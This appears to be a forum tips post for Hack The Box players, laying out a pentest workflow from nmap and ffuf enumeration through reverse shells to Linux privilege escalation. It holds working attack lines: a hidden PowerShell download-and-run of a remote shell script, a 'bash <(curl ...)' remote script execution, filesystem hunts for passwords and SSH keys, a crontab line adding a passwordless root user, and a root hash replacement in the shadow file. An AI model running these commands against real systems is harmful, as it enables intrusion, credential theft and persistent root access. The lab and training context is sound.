This post is created since there seems to be a lot of common questions in the HtB Discord and Forums. The below tips are jumping off points to do additional research for these tools and their capabilities.
Reconnaissance
We need to gather information about the target.
Nmap
Nmap scan for open ports and corresponding services.
nmap -A -sV -T4 -vvv TARGET -oN the_box_name.txt
-A
: Enables OS detection, version detection, script scanning, and traceroute.-sV
: Enables version detection, which attempts to identify the specific software version running on open ports.-T4
: Sets the timing template to level 4, which is aggressive and suitable for scanning smaller networks.-vvv
: Increases the verbosity level to 3, displaying detailed information about the scan progress.-oN
: Output scan to file. I like doing this so I don't have to waste time doing another scan or looking back through console history.
In actual penetration test scans, you may want to specify --min-rate
and/or --max-rate
options to specify minimum and maximum packets per second (pps) to avoid overwhelming the target or triggering intrusion detection systems (IDS).
Take note of versions of the services reported.
Typically you'll find something and if it a service on port 80
, it's likely to be a hosted website. It's good to add this to your /etc/hosts
file:
sudo -- sh -c -e "echo '10.10.11.1 box_name.htb' >> /etc/hosts";
or
echo '10.10.11.1 box_name.htb' | sudo tee -a /etc/hosts
Most of the time the URL
is http://box_name.htb
, but sometimes, that's not the case and you want to look for any indications on the website, because it will aid you later in VHOST enumeration.
Enumeration
Page/Web-Content Enumeration
With any page/web-content we need to have a some good wordlists such as SecLists under the Discovery/Web-Content
path. Along with tools like FFuF (Fuzz Faster u Fools) and GoBuster to discover content. Use a wordlist based off clues of the type of web framework used from viewing the source of the site and the headers as well as page extensions (for example .aspx
, php
, .jsp
, etc).
Sometimes you may want to scrap keywords off the hosted sites with cewl to generate a targeted wordlist.
cewl http://box_name.htb -w your_generated_wordlist.txt
ffuf -u http://box_name.htb/FUZZ -w common.txt
Where FUZZ
is the keyword that will be replaced with words in the passed in wordlist for fuzzing.
It's good to use multiple tools since they may have different results due to their detection logic and thresholds. Here is the equivalent command with GoBuster
:
gobuster dir -u http://10.10.11.1/ -w common.txt -b 302
The -b 302
since we want to exclude 302
status codes. Look at the -x
for extension options.
Also look at FeroxBuster for as well:
feroxbuster -u http://10.10.11.23 -w common.txt
The FeroxBuster documentation has a good breakdown of a comparison:
All three are typically faster than older discover tools like dirbuster
and wfuzz.
Sub-domain/Virtual Host Enumeration
In HtB machines, there usually aren't subdomains to enumerate, but VHosts serve the same purpose.
A subdomain is a domain that is part of a larger domain name. It is a way to organize and structure your website content. Subdomains can be used to create separate sections of a website, such as blog.example.com
or store.example.com
. Technically, subdomains are treated as separate domains by the Domain Name System (DNS), but they are still part of the parent domain.
A virtual host (VHOST), also known as a name-based virtual host or shared IP hosting, is a method of hosting multiple domain names on a single server using a single IP address. This is achieved by serving different websites based on the hostname requested by the client (e.g., browser). When a client requests a website, it includes the hostname in the HTTP request, allowing the server to determine which website to serve.
The main difference between virtual hosts and subdomains is that virtual hosts allow multiple domains to be hosted on a single server using a single IP address, while subdomains are used to create separate sections within a single domain. Which makes sense for Hack-the-Box machines and the supporting infrastructure.
You will need to also use a wordlists under /SecLists/Discovery/DNS
for this:
ffuf -w subdomains-top1million-5000.txt -u http://10.10.11.1 -H "HOST: FUZZ.box_name.htb" -ac
The -ac
flag for auto-calibrate-filtering-options
is great. It will send pre-flight checks before scanning starts and analyzes the responses for status code and content-length for filtering. This option makes it easier to to use FFuF
over GoBuster
.
Update the /etc/hosts
with with any new VHosts found:
sudo sed -i '$ d' /etc/hosts
echo '10.10.11.1 box.htb vhost1.box.htb' | sudo tee -a /etc/hosts
Robots.txt
The robots.txt will be helpful in showing you any restricted web crawler/robot files and folders. Lots of simpler CTFs and cyber-ranges will use this as a clue because it's realistic.
User-Agent: *
# Directories
Disallow: /admin/
Disallow: /documentation/
Disallow: /bin/
# Files
Disallow: /license.txt
Disallow: /README.txt
Disallow: /passwords.txt
Disallow: /database.bak
Nuclei
Use Nuclei to scan for vulnerabilities in all your discovered sites:
nuclei -u http://box_name.htb
Foothold
Look for anything from the enumeration and scans to give you the data of what frameworks and versions are being used. Then using Google dorking and Exploit-DB/SearchSploit will give you possible clues of vulnerabilities and exploits.
searchsploit afd windows local
If you can find some way to get remote code execution such as with a reverse shell. Once you have a remote shell, you can look around for any clues to get a full Secure Shell Session (SSH).
Setup a listener on one of your terminal sessions with the port specified in your reverse shell payload and the IP of your client (not target) with ifconfig
or ipconfig
:
nc -nvlp 7001
Linux
Run the following to get more featured shell:
python -c "import pty; pty.spawn('/bin/sh')"
or
python -c 'import pty; pty.spawn("bin/bash")'
Which spawns a new shell with the pty
module with the same level of access as current shell.
To add the clear
command among others:
export TERM=xterm
To get tab autocomplete and arrow keys, background the process with CTRL + Z
and you should be back to the original terminal session and run:
stty raw -echo; fg
It will turn off our terminal's echo and then resumes the last backgrounded process. Now we should also expect CTRL + C
to work without exiting the session.
Windows
If it is a Windows
machine and if it has PowerShell, you can run a better reverse shell with https://github.com/antonioCoco/ConPtyShell
Example, assuming you are hosting with your target machine an http.server
(see below):
powershell -nop -w hidden -c IEX(IWR http://CLIENT_IP:PORT/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [YOUR_CLIENT_IP] [YOUR_CLIENT_PORT]
Privilege Escalation
Tools like PEASS-ng/linPEAS.sh and gftobins.io will help you with privilege escalation, but you need to get it onto the target to run. To transfer files from your client to the target, you can spin up an http server:
python3 -m http.server 5502
From the target machine where you have shell:
curl your_client_ip:port
In the real world, the payloads could be downloaded from the internet. They could be obfuscated with base-64
. Ideally, attackers will want to live off the land instead of bringing in additional tools. You may also be restricted in space or write permissions so you can by pass this by running scripts directly from cURL
:
bash < (curl -s http://your_web_server_ip:port/some_script.sh)
See if the user you currently have access to has access to sudo
commands:
sudo -l
Credentials Search
We could also look for strings in all files. This command will search for word password anywhere in files and spit it out in red color:
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
Or with locate
:
locate password | less
Other options:
find / -name authorized_keys
find / -name id_rsa 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Crontab
Look for any scripts that are called by cronjobs.
echo '* * * * * root /bin/bash -c "echo root2::0:0:root:/root:/bin/bash >> /etc/passwd"' | sudo tee -a /etc/crontab
SUID
Look for anything that can be executed in the context of the owner like root
:
find / -type f -perm -04000 -ls 2>/dev/null
Symlink
You can give your access to restricted directories and files sometimes with symbolic links
:
ln -s /root root
ln -s /etc/shadow shadow
Shadow File
If you have access to the /etc/shadow
and /etc/passwd
files you can try cracking the user passwords with Hashcat or john-the-ripper, but you need to unshadow
the files first:
unshadow passwd.txt shadow.txt > unshadowed.txt
You could manually do this also. This is the schema for the entries:
username:$hash_algo$password_hash$last_changed:minimum_days_pwd_change:maximum_days_pwd_change:warn_expire_days:days_inactive:expiration_date
The hashing algorithm used is yescrypt as denoted by $y
in the entry, which a GPU
will not have a good time cracking. John the Ripper will support it with:
john hashes.txt --format=crypt --wordlist=your_wordlist
It will be slow and may not even get cracked depending on your wordlist.
If you can alter the /etc/shadow
file directly with either the known password hash for a known user or just allow for empty password:
root:$y$::19742:0:99999:7:::
The *
or !
will denote a locked account.
Here is quick replacement. You can change the root password faster and remember to escape special characters with \
:
root_hash="root\:\\\$y\\\$j9T\\\$VEMcaSLaOOvSE3mYgRXRv\/\\\$xMXYxTRyCAkwoSHhlyIoDS01clvPEp\/hh0r3MSClmL1\:19742\:0\:99999\:7\:\:\:"
known_hash="root\:\\\$y\\\$j9T\\\$RUjBgvOODKC9hyu5u7zCt0\\\$Gf8nqZ4umh3s1N69EeoQ4N5user6c2SlGb1LvBFRxFz\:19742\:0\:99999\:7\:\:\:"
sed -i "s|$root_hash|$known_hash|" shadow
Use su root
to change to root user.
GL-HF